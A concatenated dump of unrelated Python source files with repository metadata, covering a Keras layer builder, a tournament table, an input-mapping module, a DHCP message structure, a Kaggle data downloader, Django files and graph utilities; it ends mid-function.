                model.add(Dense(units, input_dim=input_dim, kernel_initializer=self.kernel_initializer, kernel_regularizer=self.kernel_regularizer))
            else:
                model.add(Dense(units, kernel_initializer=self.kernel_initializer, kernel_regularizer=self.kernel_regularizer))
            return model
        ## Hidden Layer (identical to the input branch apart from the key prefix)
        if self.layer_type == "hidden":
            units = params[str(self.layer_type + "_layer_" + str(count) + "_units")]
            if input_dim is not None:
                model.add(Dense(units, input_dim=input_dim, kernel_initializer=self.kernel_initializer, kernel_regularizer=self.kernel_regularizer))
            else:
                model.add(Dense(units, kernel_initializer=self.kernel_initializer, kernel_regularizer=self.kernel_regularizer))
            return model
        ## Activation Layer
        if self.layer_type == "activation":
            model.add(get_activation_layer(params["activation_function"]))
            return model
        ## Dropout Layer (skipped entirely when the rate is zero)
        if self.layer_type == "dropout":
            dropout_rate = params["dropout_rate"]
            if dropout_rate > 0:
                model.add(Dropout(dropout_rate))
            return model
        ## Output Layer
        if self.layer_type == "output":
            if mode == "classifier":
                model.add(Dense(output_layer_units, kernel_initializer=self.kernel_initializer))
                # Output activation is optional for classifiers.
                try:
                    if params["output_activation_function"] != None:
                        model.add(get_activation_layer(params["output_activation_function"]))
                except KeyError:
                    pass
            elif mode == "regressor":
                model.add(Dense(output_layer_units, kernel_initializer=self.kernel_initializer))
            else:
                raise ValueError("mode has to be 'regressor' or 'classifier'")
            return model
        ## LSTM Layer
        # if self.layer_type == "LSTM":
        #     units = params[str(self.layer_type + "_layer_" + str(count) + "_units")]
        #     count_LSTM = layers.count("LSTM")
        #     if count < count_LSTM:
        #         return_sequences = True
        #     else:
        #         return_sequences = False
        #     if input_dim is not None:
        #         model.add(LSTM(units, input_dim=input_dim, recurrent_activation=params["LSTM_recurrent_activation_function"], return_sequences=return_sequences))
        #     else:
        #         model.add(LSTM(units, recurrent_activation=params["LSTM_recurrent_activation_function"], return_sequences=return_sequences))
        #     return model
3a9b8204ffb1f187d8be96695d1cf97c47ce3c0a | 3,618 | py | Python | tournament.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null | tournament.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null | tournament.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null |
class Tournament:
    def __init__(self):
        # Group tables: group letter -> {team: [played, scored, conceded,
        # goal_diff, points, rank]}; rank is filled in by sort_group.
        self.tables = {'A': {}, 'B': {}, 'C': {}, 'D': {}, 'E': {}, 'F': {}, 'G': {}, 'H':{}}
        self.groups_finished = False
        # Knockout results ('W<game>'/'L<game>') and group placements ('1A', '2B', ...).
        self.records = {}
        self.references = {}
        from parsers.utils import read_json
        # NOTE(review): hard-coded absolute path — breaks on any other machine;
        # consider making it configurable.
        self.r = read_json('/home/karol/python/predictor/data/matches')
    def update_match(self, group, home_team, away_team, home_score, away_score, game, result, date):
        # Append the raw result to the match history used by get_form/get_h2h.
        self.r.append({
            "away_score": away_score,
            "away_team": away_team,
            "date": date,
            "home_score": home_score,
            "home_team": home_team
        })
        if not self.groups_finished:
            # Group stage: update the standings table.
            self.update_group_match(group, home_team, away_team, home_score, away_score)
        else:
            # Knockout stage: record winner/loser of this game number so later
            # fixtures can resolve 'W<game>' / 'L<game>' references.
            # `result` is from the home team's perspective ('W' or 'L').
            if result == 'W':
                self.records['W'+game] = home_team
                self.records['L'+game] = away_team
            elif result == 'L':
                self.records['L'+game] = home_team
                self.records['W'+game] = away_team
def get_reference(self, key):
if key[:1] not in ['W', 'L']:
return self.references[key]
else:
return self.records[key]
def update_group_match(self, group, home_team, away_team, home_score, away_score):
group = group.split(' ')[1]
table = self.tables[group]
home_score = int(home_score)
away_score = int(away_score)
home_points = 0
away_points = 0
if home_score > away_score:
home_points = 3
away_points = 0
elif away_score > home_score:
home_points = 0
away_points = 3
else:
home_points = 1
away_points = 1
d = {
home_team: [home_score, away_score, home_points],
away_team: [away_score, home_score, away_points]
}
# Check if teams are present
for i in [home_team, away_team]:
if i not in table:
table[i] = [0, 0, 0, 0, 0, 0]
table[i][0] += 1
table[i][1] += d[i][0]
table[i][2] += d[i][1]
table[i][3] += d[i][0] - d[i][1]
table[i][4] += d[i][2]
self.tables[group] = table
self.check_finished()
    def check_finished(self):
        # Bail out unless every team in every group has played all 3 games.
        for i in self.tables:
            table = self.tables[i]
            for j in table:
                team = table[j]
                if team[0] != 3:
                    return
        self.groups_finished = True
        # All groups complete: rank each group and record the top two teams
        # as '1<group>' / '2<group>' references for the knockout fixtures.
        for i in self.tables:
            table = self.tables[i]
            print(table)
            table = self.sort_group(table)
            keys = list(table)
            one = ''
            two = ''
            for item in table:
                team = table[item]
                if team[5] == 1:
                    one = item
                elif team[5] == 2:
                    two = item
            self.references['1'+ i] = one
            self.references['2'+ i] = two
        from pprint import pprint
        pprint(self.tables)
        pprint(self.references)
def sort_group(self, table):
sorted = 1
keys = list(table)
print(table)
for i in range(len(table)):
highest = None
highest_index = None
for j in range(len(table)):
current = table[keys[j]]
print(current)
if current[5] != 0:
continue
if highest_index == None and highest == None:
highest_index = j
highest = current
if current[4] > highest[4] :
current = highest
highest_index = j
elif current[4] == highest[4]:
if current[3] > highest[3]:
current = highest
highest_index = j
elif current[3] == highest[3]:
if current[1] > highest[1]:
current = highest
highest_index = j
print (keys[highest_index])
table[keys[highest_index]][5] = sorted
sorted += 1
return table
    def get_form(self, country, date):
        """Return recent-form data for *country* as of *date*.

        Delegates to parsers.match_parser.get_form with this object's
        shared resource self.r.  NOTE(review): the import is local —
        presumably to avoid an import cycle; confirm.
        """
        from parsers.match_parser import get_form
        return get_form(country, date, self.r)
    def get_h2h(self, country1, country2, date):
        """Return head-to-head data for the two countries as of *date*.

        Delegates to parsers.match_parser.get_h2h with this object's
        shared resource self.r.  NOTE(review): local import, presumably
        cycle avoidance — confirm.
        """
        from parsers.match_parser import get_h2h
        return get_h2h(country1, country2, date, self.r)
| 22.060976 | 97 | 0.622443 |
3a9e23b66225e7784226027da5b0c2acadfbb17f | 4,905 | py | Python | rurina5/input/map.py | TeaCondemns/rurina | 43725ebea5872953125271a9abb300a4e3a80a64 | [
"MIT"
] | null | null | null | rurina5/input/map.py | TeaCondemns/rurina | 43725ebea5872953125271a9abb300a4e3a80a64 | [
"MIT"
] | null | null | null | rurina5/input/map.py | TeaCondemns/rurina | 43725ebea5872953125271a9abb300a4e3a80a64 | [
"MIT"
] | null | null | null | from typing import Union, Sequence
import event
_actions = {}
"""_actions = {
'action_name': {
'event1event2':
{
'event1': ...,
'event2': ...
}
}
}"""
def addaction(name: str):
    """Register *name* as an input action; a no-op if already present."""
    _actions.setdefault(name, {})
def removeaction(name: str):
    """Forget the action called *name*; unknown names are ignored."""
    _actions.pop(name, None)
def haveaction(name: str) -> bool:
    """Return True if an action called *name* has been registered."""
    return name in _actions
def _action_status(name: str, index: int) -> bool:
    """Return True if any event combination bound to action *name* has a
    truthy flag at *index* (1 = current frame, 2 = previous frame).

    Simplified from the original accumulate-then-test loop: we can
    return as soon as one combination reports True, and False is the
    only other outcome (including when *name* is unknown).
    """
    if name not in _actions:
        return False
    for hashable_event_fullname in _actions[name]:
        event_fullname = list(_actions[name][hashable_event_fullname].keys())
        if _eventstatus(name, event_fullname, index):
            return True
    return False
def actionstatus(name: str) -> bool:
    """Return True if action *name* is active as of the latest flip()."""
    return _action_status(name, 1)
def last_actionstatus(name: str) -> bool:
    """Return True if action *name* was active one flip() earlier."""
    return _action_status(name, 2)
def _event(event_fullname: Union[Sequence[str], str]):
if isinstance(event_fullname, str):
event_fullname = [event_fullname]
return event_fullname, ''.join(event_fullname)
def setevent(
        action_name: str,
        event_fullname: Union[Sequence[str], str],
        inverse_event_fullname: Union[Sequence[str], str] = None
):
    """Bind an event combination to *action_name*.

    Each event is stored under the combination's joined key as
    [inverse_event_fullname, active_now, active_before], with both
    flags initialised to False.  A None or bare-string inverse is
    broadcast to every event of the combination.
    """
    addaction(action_name)
    event_fullname, hashable_event_fullname = _event(event_fullname)
    if inverse_event_fullname is None or isinstance(inverse_event_fullname, str):
        inverse_event_fullname = [inverse_event_fullname] * len(event_fullname)
    if hashable_event_fullname not in _actions[action_name]:
        _actions[action_name][hashable_event_fullname] = {}
    for i in range(len(event_fullname)):
        _actions[action_name][hashable_event_fullname][event_fullname[i]] = [inverse_event_fullname[i], False, False]
def remove_event(action_name: str, event_fullname: Union[Sequence[str], str]):
    """Remove the given event names from the combination's registry entry.

    Bug fix: the original probed ``have_event(action_name, name)`` with a
    single event name, which re-derives the joined key from that one name
    alone; for multi-event combinations the key never matched and nothing
    was ever deleted.  Membership is now tested under the combination's
    own joined key.  Unknown actions/combinations are silently ignored.
    """
    event_fullname, hashable_event_fullname = _event(event_fullname)
    combo = _actions.get(action_name, {}).get(hashable_event_fullname)
    if combo is None:
        return
    for name in event_fullname:
        if name in combo:
            del combo[name]
def have_event(action_name: str, event_fullname: Union[Sequence[str], str]) -> bool:
    """Return True if every event name of the combination is registered
    under *action_name* for exactly that combination.

    An empty sequence yields True (vacuous truth), matching the original
    behaviour.  Rewritten from the accumulate-then-test loop to fail
    fast on the first missing name.
    """
    event_fullname, hashable_event_fullname = _event(event_fullname)
    for name in event_fullname:
        if (action_name not in _actions
                or hashable_event_fullname not in _actions[action_name]
                or name not in _actions[action_name][hashable_event_fullname]):
            return False
    return True
def _eventstatus(action_name: str, event_fullname: Union[Sequence[str], str], index: int) -> bool:
    """Return True if every event of the combination has a truthy flag at
    *index* (1 = current frame, 2 = previous frame).

    Unknown actions/combinations yield False; an empty combination is
    vacuously True, matching the original.  The registration check is
    hoisted out of the loop (nothing mutates between iterations) and the
    accumulate-then-test pattern replaced with early returns.
    """
    event_fullname, hashable_event_fullname = _event(event_fullname)
    if event_fullname and not have_event(action_name, event_fullname):
        return False
    for name in event_fullname:
        if not _actions[action_name][hashable_event_fullname][name][index]:
            return False
    return True
def eventstatus(action_name: str, event_fullname: Union[Sequence[str], str]) -> bool:
    """True if the whole combination is active as of the latest flip()."""
    return _eventstatus(action_name, event_fullname, 1)
def last_eventstatus(action_name: str, event_fullname: Union[Sequence[str], str]) -> bool:
    """True if the whole combination was active one flip() earlier."""
    return _eventstatus(action_name, event_fullname, 2)
def flip():
    """Advance the input state one frame.

    Copies each event's 'now' flag into its 'previous' slot, then
    rescans the event buffer: events without an inverse are
    level-triggered and reset every frame; events with an inverse stay
    latched until the inverse event arrives.  Matching is by substring
    against event.fullname(e) with a trailing space appended.
    """
    event_buffer = event.get(False)
    for action_name in _actions:
        for event_fullname in _actions[action_name]:
            # NOTE: the keys are already the joined strings, so this
            # join is a no-op kept from the original.
            hashable_event_fullname = ''.join(event_fullname)
            for _event_fullname in _actions[action_name][hashable_event_fullname]:
                action_event = _actions[action_name][hashable_event_fullname][_event_fullname]
                action_event[2] = action_event[1]
                if action_event[0] is None:
                    action_event[1] = False
                for e in event_buffer:
                    fullname = event.fullname(e)
                    if action_event[0] is None and (_event_fullname + ' ') in fullname:
                        action_event[1] = True
                    elif action_event[0] is not None:
                        if (_event_fullname + ' ') in fullname:
                            action_event[1] = True
                        elif (action_event[0] + ' ') in fullname:
                            action_event[1] = False
# Public API of the input-mapping module; helpers prefixed with an
# underscore stay unexported.
__all__ = (
    'addaction',
    'removeaction',
    'haveaction',
    'actionstatus',
    'last_actionstatus',
    'setevent',
    'remove_event',
    'have_event',
    'eventstatus',
    'last_eventstatus',
    'flip',
)
| 29.196429 | 117 | 0.648114 |
3a9f119bf4f058c5f85a03cbf6f4da2b349b8dd5 | 1,604 | py | Python | data/ABC/filter_out_tiny_models.py | YoungXIAO13/6DPoseEstimationDatasets | b9cb1d9842870860a15bf3cf600cdfb68d1e195e | [
"MIT"
] | 383 | 2019-09-03T15:29:22.000Z | 2022-03-28T02:01:15.000Z | data/ABC/filter_out_tiny_models.py | Fang-Haoshu/ObjectPoseEstimationSummary | 2a11797e6b01e1820105740fcaeb7c049094c57f | [
"MIT"
] | 5 | 2019-10-18T13:04:07.000Z | 2021-09-29T05:26:52.000Z | data/ABC/filter_out_tiny_models.py | Fang-Haoshu/ObjectPoseEstimationSummary | 2a11797e6b01e1820105740fcaeb7c049094c57f | [
"MIT"
] | 63 | 2019-09-17T12:13:51.000Z | 2022-03-28T03:06:05.000Z | import os
from os.path import join, getsize
from PIL import Image
from tqdm import tqdm
import numpy as np
import argparse
# For every model under <dataset_dir>/<views>, record one CSV row with the
# .obj file size (MiB) and the min/max aspect ratio and foreground
# occupancy of its 'nocs' renderings.
parser = argparse.ArgumentParser()
parser.add_argument('--dataset_dir', type=str, help='dataset directory')
parser.add_argument('--model', type=str, default='abc_0000', help='subdirectory containing obj files')
parser.add_argument('--views', type=str, default='multiviews', help='subdirectory containing multiviews')
args = parser.parse_args()
obj_dir = join(args.dataset_dir, args.model)
view_dir = join(args.dataset_dir, args.views)
model_names = sorted(os.listdir(view_dir))
csv_file = join(args.dataset_dir, '{}.txt'.format(args.model))
with open(csv_file, 'w') as f:
    f.write('model_name,size,ratio_min,ratio_max,occupy_min,occupy_max\n')
for model_name in tqdm(model_names):
    # .obj size truncated to whole MiB.
    size = int(getsize(join(obj_dir, '{}.obj'.format(model_name))) / (2 ** 20))
    img_dir = join(view_dir, model_name, 'nocs')
    images = os.listdir(img_dir)
    ratio = []
    occupy = []
    for img in images:
        try:
            rgb = Image.open(join(img_dir, img))
            w, h = rgb.size
            left, upper, right, lower = rgb.getbbox()
            ratio.append((lower - upper) / (right - left))
            # Fraction of non-black pixels in the greyscale rendering.
            occupy.append(np.sum(np.array(rgb.convert('L')) != 0) / (w * h))
        except (TypeError, ZeroDivisionError):
            # getbbox() returns None for an all-black image (TypeError on
            # unpack); a zero-width bbox raises ZeroDivisionError -- the
            # original crashed on that case.  Score both metrics as 0.
            ratio.append(0)
            occupy.append(0)
    # Re-open in append mode per model so partial results survive a crash.
    with open(csv_file, 'a') as f:
        f.write(model_name + ',' + str(size) + ',' + str(np.min(ratio)) + ',' + str(np.max(ratio)) + ',' +
                str(np.min(occupy)) + ',' + str(np.max(occupy)) + '\n')
| 39.121951 | 106 | 0.639027 |
3aa041de8b903df622c3ee51ddf1f6842ee18d8c | 59 | py | Python | perception/navigator_vision/navigator_vision/__init__.py | czk100/NaviGator | c078c68768c1df4ad48c4c9a60a8c0bf4bdab63a | [
"MIT"
] | null | null | null | perception/navigator_vision/navigator_vision/__init__.py | czk100/NaviGator | c078c68768c1df4ad48c4c9a60a8c0bf4bdab63a | [
"MIT"
] | null | null | null | perception/navigator_vision/navigator_vision/__init__.py | czk100/NaviGator | c078c68768c1df4ad48c4c9a60a8c0bf4bdab63a | [
"MIT"
] | null | null | null | from scan_the_code_classifier import ScanTheCodeClassifier
| 29.5 | 58 | 0.932203 |
3aa10622900b7fd3873b3fb7ab47170cdb7c2440 | 2,959 | py | Python | assignments/06-python-first-lines/first_lines.py | patarajarina/biosys-analytics | a5e8845211797364ec6f7f8679911ed3b5312887 | [
"MIT"
] | null | null | null | assignments/06-python-first-lines/first_lines.py | patarajarina/biosys-analytics | a5e8845211797364ec6f7f8679911ed3b5312887 | [
"MIT"
] | null | null | null | assignments/06-python-first-lines/first_lines.py | patarajarina/biosys-analytics | a5e8845211797364ec6f7f8679911ed3b5312887 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Author : patarajarina
Date : 2019-02-25
Purpose: Rock the Casbah
"""
import argparse
import sys
import os
# --------------------------------------------------
def get_args():
    """Parse command-line arguments.

    Returns a namespace with:
      positional -- one or more directory names (metavar DIR)
      width      -- total report line width in characters (default 50)

    Cleanup: two large blocks of commented-out argument definitions
    removed; behaviour and help text are unchanged.
    """
    parser = argparse.ArgumentParser(
        description='Argparse Python script',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument(
        'positional', metavar='DIR', help='A positional argument', nargs='+')
    parser.add_argument(
        '-w',
        '--width',
        help='A named integer argument',
        metavar='int',
        type=int,
        default=50)
    return parser.parse_args()
# --------------------------------------------------
def warn(msg):
    """Print a message to STDERR (stdout stays clean for the report)."""
    print(msg, file=sys.stderr)
# --------------------------------------------------
def die(msg='Something bad happened'):
    """warn() and exit the process with a non-zero status."""
    warn(msg)
    sys.exit(1)
# --------------------------------------------------
def main():
    """Report the first line of every file in each DIR argument.

    For each directory named on the command line, print the directory
    name followed by one line per file: the file's first line, a dot
    leader, and the file name, padded toward the requested width.
    Non-directories are reported on STDERR.  As in the original, when
    two files share the same first line the later one (in os.listdir
    order) wins.

    Cleanup: commented-out scaffolding removed, the leaked file handle
    now closed via ``with``, and the quadratic dot-building loop
    replaced by string repetition (identical output, including the
    minimum of one dot).
    """
    args = get_args()
    width = args.width
    for dirname in args.positional:
        if not dirname.endswith('/'):
            dirname = dirname + '/'
        if not os.path.isdir(dirname):
            # Strip the slash again so the message shows the argument
            # roughly as the user typed it.
            print('"{}" is not a directory'.format(dirname[:-1]), file=sys.stderr)
            continue
        print(dirname[:-1])
        out = {}
        for eachfile in os.listdir(dirname):
            with open(dirname + eachfile, "r") as fh:
                firstline = fh.readline().strip()
            out[firstline] = eachfile
        for keyline, valfile in sorted(out.items()):
            leftlen = width - len(keyline) - len(valfile)
            dots = '.' * max(leftlen, 1)  # the original always emitted >= 1 dot
            print('{} {} {}'.format(keyline, dots, valfile))
# --------------------------------------------------
if __name__ == '__main__':
main()
| 26.9 | 82 | 0.460967 |
3aa3c3abf98c6d1ad3b59e984112889aa463ffaf | 4,251 | py | Python | inocybe_dhcp/rfc2131.py | kot-begemot-uk/opx-dhcp | 683c7c52f19eedc57196403213c9695ac3439526 | [
"Apache-2.0"
] | null | null | null | inocybe_dhcp/rfc2131.py | kot-begemot-uk/opx-dhcp | 683c7c52f19eedc57196403213c9695ac3439526 | [
"Apache-2.0"
] | null | null | null | inocybe_dhcp/rfc2131.py | kot-begemot-uk/opx-dhcp | 683c7c52f19eedc57196403213c9695ac3439526 | [
"Apache-2.0"
] | 2 | 2018-09-05T07:59:21.000Z | 2018-09-14T07:15:17.000Z | #!/usr/bin/env python3
'''RFC 2131 DHCP message structures.'''
# Copyright (c) 2018 Inocybe Technologies.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT
# LIMITATION ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS
# FOR A PARTICULAR PURPOSE, MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
from six import add_metaclass
from .types import (
StructuredValue,
UInt8, UInt16, UInt32, IPv4,
HexString, NulTerminatedString,
)
from .rfc2132 import Cookie, Options
from .options import Supported
@add_metaclass(StructuredValue)
class Message(object):
    '''A class representing a RFC 2131 DHCP message.
    Each instance is a :class:`dict` instance restricted to the pairs specified in :attr:`spec`:
    attempting to set a pair at a key not in :attr:`spec` is rejected with :class:`KeyError`;
    attempting to set a pair with a value which is not supported by that pair's value type is
    rejected with :class:`ValueError` or :class:`TypeError`.
    An instance of this class may be created as per :class:`dict`, or by calling classmethod
    :meth:`unpack` with a binary string, encoded as per RFC 2131. To serialise an instance to a
    binary string, call :meth:`pack`.
    If a new value is set at 'hlen' or 'chaddr' then call :meth:`truncate_chaddr` to ensure that
    the encoded value of 'chaddr' does not exceed 'hlen' octets.
    '''
    name = 'RFC 2131 DHCP message'
    ### :attr:`spec` is a sequence of (key, value type) pairs, in wire
    ### order, covering every fixed field of the RFC 2131 message plus
    ### the magic cookie and the variable-length options area.
    spec = (
        ('op', UInt8(1, 2)),
        ('htype', UInt8()),
        ('hlen', UInt8(1, 16)),
        ('hops', UInt8()),
        ('xid', UInt32()),
        ('secs', UInt16()),
        ('flags', UInt16()),
        ('ciaddr', IPv4()),
        ('yiaddr', IPv4()),
        ('siaddr', IPv4()),
        ('giaddr', IPv4()),
        ('chaddr', HexString(16)),
        ('sname', NulTerminatedString(64)),
        ('file', NulTerminatedString(128)),
        ('cookie', Cookie()),
        ('options', Options()),
    )
    def __init__(self):
        self.truncate_chaddr()
    def truncate_chaddr(self):
        '''If this instance's 'chaddr' is too long to be encoded in 'hlen' octets then truncate the
        value of 'chaddr' so that it can be encoded in 'hlen' octets. If this instance does not
        have a value for 'chaddr' or 'hlen' then do nothing.
        '''
        ### pylint: disable=unsubscriptable-object
        try:
            self['chaddr'] = self.fields['chaddr'].truncate(self['chaddr'], self['hlen']) ### pylint: disable=no-member
        except KeyError:
            pass
    def decode_options(self, supported=None):
        '''Return a plain :class:`dict` copy of `self`, with 'options' decoded using `supported`. If
        `supported` is None, then decode options as TLV.
        '''
        if supported is None:
            ### use an empty set of supported options to decode as TLV
            supported = Supported()
        copy = dict(self)
        copy['options'] = supported.decode(self['options']) ### pylint: disable=unsubscriptable-object
        return copy
    def encode_options(self, options, supported=None, append=False):
        '''Set this instance's 'options' from `options` encoded using `supported`. If `supported` is
        None, then encode options from TLV. If `append` is True, then append encoded `options` to
        the existing 'options' rather than replacing them.
        '''
        if supported is None:
            ### use an empty set of supported options to encode from TLV
            supported = Supported()
        encoded = tuple(supported.encode(options))
        if append:
            self['options'] += encoded ### pylint: disable=unsubscriptable-object
        else:
            self['options'] = encoded ### pylint: disable=unsubscriptable-object
3aa5d9d21b6bad4cb5b8740e530181d78e841342 | 1,883 | py | Python | src/data/get_raw_data.py | vivek1739/titanic | 39058f7ecef3ae0e1962fc1dfc550b654e97e1f0 | [
"MIT"
] | null | null | null | src/data/get_raw_data.py | vivek1739/titanic | 39058f7ecef3ae0e1962fc1dfc550b654e97e1f0 | [
"MIT"
] | null | null | null | src/data/get_raw_data.py | vivek1739/titanic | 39058f7ecef3ae0e1962fc1dfc550b654e97e1f0 | [
"MIT"
] | null | null | null | # encoding utf-8
import os
from dotenv import find_dotenv,load_dotenv
from requests import session
import logging
# Payload for the Kaggle login form; credentials come from the environment.
# NOTE(review): this dict is built at import time, i.e. BEFORE the
# __main__ block calls load_dotenv(), so credentials that exist only in
# a .env file will come back as None -- confirm and consider building it
# inside extract_data() instead.
payload = {
    'action':'login',
    'username': os.environ.get("KAGGLE_USERNAME"),
    'password': os.environ.get("KAGGLE_PASSWORD")
}
def extract_data(url, file_path):
    '''Log in to Kaggle with the module-level `payload` and stream `url`
    to `file_path` in 1 KiB chunks.

    NOTE(review): neither the login POST nor the download GET is checked
    for success, so a failed login silently writes an HTML error page to
    disk -- confirm whether status checking is wanted.
    '''
    with session() as c:
        c.post('https://www.kaggle.com/account/login',data=payload)
        with open(file_path,'wb') as handle:
            response = c.get(url, stream=True)
            for block in response.iter_content(1024):
                handle.write(block)
def main(project_dir):
    '''Download the Kaggle Titanic train/test CSVs into data/raw.

    NOTE(review): output paths are built from os.path.curdir rather than
    from *project_dir* -- the argument is only logged; confirm intent.
    '''
    # get logger
    logger = logging.getLogger(__name__)
    logger.info('getting raw data')
    logger.info(project_dir)
    # urls for the Titanic competition files
    train_url = 'https://www.kaggle.com/c/3136/download/train.csv'
    test_url = 'https://www.kaggle.com/c/3136/download/test.csv'
    # raw sub folder inside data folder
    raw_data_path = os.path.join(os.path.curdir,'data','raw')
    train_data_path = os.path.join(raw_data_path,'train.csv')
    test_data_path = os.path.join(raw_data_path,'test.csv')
    # extract data
    extract_data(train_url,train_data_path)
    extract_data(test_url,test_data_path)
    logger.info('downloaded raw training and test data')
if __name__ =='__main__':
    # getting the root directory (two levels above this file)
    project_dir = os.path.join(os.path.dirname(__file__),os.pardir,os.pardir)
    print('project dir : '+project_dir)
    # setup logger
    log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    logging.basicConfig(level=logging.INFO,format=log_fmt)
    # find .env automatically by walking up the directories until its found
    dotenv_path = find_dotenv()
    load_dotenv(dotenv_path)
    # NOTE(review): the module-level `payload` was already evaluated at
    # import time, before load_dotenv() runs here, so credentials that
    # live only in .env are not picked up -- confirm and fix.
    # call the main
    main(project_dir)
3aa64d8b8830c4c3c052d815f3baf34b10969969 | 168 | py | Python | core/admin.py | yasminfarza/country-state-address-api | 39c8d349095dcca4f2411f7097497d6a8f39c1e1 | [
"MIT"
] | 4 | 2021-06-06T14:16:33.000Z | 2021-06-09T03:42:11.000Z | core/admin.py | yasminfarza/country-state-address-api | 39c8d349095dcca4f2411f7097497d6a8f39c1e1 | [
"MIT"
] | null | null | null | core/admin.py | yasminfarza/country-state-address-api | 39c8d349095dcca4f2411f7097497d6a8f39c1e1 | [
"MIT"
] | null | null | null | from django.contrib import admin
from core.models import Country, State, Address
# Expose the location models in the Django admin with the default
# ModelAdmin options.
admin.site.register(Country)
admin.site.register(State)
admin.site.register(Address)
| 21 | 47 | 0.815476 |
3aa8e8a10f90ca6b21d728f7a1f51b3d5e590506 | 770 | py | Python | apps/splash/migrations/0006_auto_20151213_0309.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 32 | 2017-02-22T13:38:38.000Z | 2022-03-31T23:29:54.000Z | apps/splash/migrations/0006_auto_20151213_0309.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 694 | 2017-02-15T23:09:52.000Z | 2022-03-31T23:16:07.000Z | apps/splash/migrations/0006_auto_20151213_0309.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 35 | 2017-09-02T21:13:09.000Z | 2022-02-21T11:30:30.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django_extensions.db.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    # Alters SplashEvent.created/.modified to django-extensions'
    # self-maintaining timestamp fields (auto_now_add / auto_now).
    dependencies = [("splash", "0005_auto_20150422_2236")]
    operations = [
        migrations.AlterField(
            model_name="splashevent",
            name="created",
            field=django_extensions.db.fields.CreationDateTimeField(
                auto_now_add=True, verbose_name="created"
            ),
        ),
        migrations.AlterField(
            model_name="splashevent",
            name="modified",
            field=django_extensions.db.fields.ModificationDateTimeField(
                auto_now=True, verbose_name="modified"
            ),
        ),
    ]
| 27.5 | 72 | 0.614286 |
3aaa3f49b8735100881fb406c235065fe7efe4e9 | 314 | py | Python | Ekeopara_Praise/Phase 1/Python Basic 1/Day 3 Tasks/Task 10.py | nkem1010/python-challenge-solutions | 203cedc691094a83b110fc75764aac51dbbc1a03 | [
"MIT"
] | null | null | null | Ekeopara_Praise/Phase 1/Python Basic 1/Day 3 Tasks/Task 10.py | nkem1010/python-challenge-solutions | 203cedc691094a83b110fc75764aac51dbbc1a03 | [
"MIT"
] | null | null | null | Ekeopara_Praise/Phase 1/Python Basic 1/Day 3 Tasks/Task 10.py | nkem1010/python-challenge-solutions | 203cedc691094a83b110fc75764aac51dbbc1a03 | [
"MIT"
] | null | null | null | '''10. Write a Python program to get a string which is n (non-negative integer) copies of a given string.
Tools: input function, slicing'''
# Read a string and a repetition count, then print the string repeated
# n times.  Uses str * int instead of the original accumulate-in-a-loop
# implementation (which was needlessly quadratic for large n); the
# redundant str() around input() is also dropped -- input() already
# returns a str.
word = input("Type in any string or word: ")
n = int(input("Enter the number of repititions: "))
ans = word * n
print(ans)
| 24.153846 | 105 | 0.656051 |
3aab0f40c2920df9397a92bef8cc72257b4908bd | 19,245 | py | Python | hajosUtil.py | eej/hajos-search | 9a8e80b3002e814475c61e8d6aa7e5b860c04e83 | [
"FSFAP"
] | 1 | 2021-04-10T21:29:39.000Z | 2021-04-10T21:29:39.000Z | hajosUtil.py | eej/hajos-search | 9a8e80b3002e814475c61e8d6aa7e5b860c04e83 | [
"FSFAP"
] | null | null | null | hajosUtil.py | eej/hajos-search | 9a8e80b3002e814475c61e8d6aa7e5b860c04e83 | [
"FSFAP"
] | null | null | null | #!/usr/bin/env python
"""
Hajos utilities.
"""
from util import *
# Hajos Sum
def hajosSum(G1, G2, x1, y1, x2, y2):
    """Hajos construction joining adjacency matrices G1 and G2.

    Vertex x2 of G2 is identified with vertex x1 of G1, the edges
    (x1, y1) and (x2, y2) are deleted, and the new edge (y1, y2) is
    added.  Returns a fresh (len(G1)+len(G2)-1)-square 0/1 adjacency
    matrix; the inputs are not modified.
    """
    # Start with a copy of G1 padded out to the combined size.
    G = []
    for i in range(len(G1)):
        G.append(G1[i][:])
        G[i].extend([0 for x in range(len(G2)-1)])
    for i in range(len(G2)-1):
        G.append([0 for x in range(len(G1) + len(G2) - 1)])
    # indexMap[i] = row/column of G2's vertex i inside the combined
    # matrix; x2 maps onto x1, every other G2 vertex gets a fresh index
    # after G1's block.
    indexMap = []
    for i in range(len(G2)):
        if i < x2:
            indexMap.append(len(G1)+i)
        elif i == x2:
            indexMap.append(x1)
        elif i > x2:
            indexMap.append(len(G1)+i-1)
    # Copy G2's edges into the combined matrix (kept symmetric).
    for i in range(len(G2)):
        for j in range(len(G2)):
            if i != j:
                if G2[i][j] == 1:
                    G[indexMap[i]][indexMap[j]] = 1
                    G[indexMap[j]][indexMap[i]] = 1
    # Delete (x1,y1) and (x2,y2), then connect y1 to y2.
    G[x1][y1] = 0
    G[y1][x1] = 0
    G[indexMap[x2]][indexMap[y2]] = 0
    G[indexMap[y2]][indexMap[x2]] = 0
    G[y1][indexMap[y2]] = 1
    G[indexMap[y2]][y1] = 1
    return G
# identify vertex
def identify(G, pair):
    """Contract vertex pair[1] into vertex pair[0].

